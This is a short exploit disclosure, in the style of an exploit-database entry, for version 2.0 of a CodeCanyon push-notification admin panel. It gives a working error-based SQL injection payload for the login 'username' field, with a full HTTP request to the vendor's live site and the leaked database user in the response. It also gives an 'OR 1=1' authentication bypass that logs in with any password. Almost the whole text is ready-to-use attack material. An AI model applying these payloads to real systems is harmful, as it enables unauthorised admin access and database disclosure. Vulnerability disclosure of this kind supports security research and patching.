# Exploit Title: Firebase Push Notification iOS / FCM + Advance Admin Panel 2.0 - 'username' SQL injection / Authentication bypass
# Date: 2018-07-08
# Exploit Author: L0RD
# Email: borna.nematzadeh123@gmail.com
# Vendor Homepage: https://codecanyon.net/item/firebase-push-notification-ios-fcm-advance-admin-panel/18600448?s_rank=19
# Version: 2.0
# Tested on: Win 10
=================================================
# POC :
# vulnerable parameter : username
# payload : 1') AND extractvalue(1,concat(0x3a,user(),0x3a))#
# Request :
==============
POST /advance_push/public/login HTTP/1.1
Host: www.icanstudioz.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
Connection: keep-alive
Upgrade-Insecure-Requests: 1
_token=ITG4QVFxob9066DAIbRm7pZ5UrFZAbN9eEQOyaVU&username=1') AND extractvalue(1,concat(0x3a,user(),0x3a))#&password=1
# Response :
===============
HTTP/1.1 500 Internal Server Error
Date: Fri, 06 Jul 2018 15:28:25 GMT
Server: Apache
Cache-Control: no-cache, private
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46984
title="Illuminate\Database\QueryException">QueryException</abbr> in <a title="/home/icanstud/public_html/advance_push/vendor/laravel/framework/src/Illuminate/Database/Connection.php line 651" ondblclick="var f=this.innerHTML;this.innerHTML=this.title;this.title=f;">Connection.php line 651</a>:</span>
<span class="exception_message">
SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ':icanstud_icanstu@localhost:' (SQL: select * from admin where (username = '1') AND extractvalue(1,concat(0x3a,user(),0x3a))#' OR email = '1') AND extractvalue(1,concat(0x3a,user(),0x3a))#') and password = md5('1'))
=============================================
2) Authentication bypass :
# Query : ('select * from admin where (username = '' OR email = '') and password = md5(''))
# Payload : x' OR 1=1)#
# Username : x' OR 1=1)#
# Password : anything
=============================================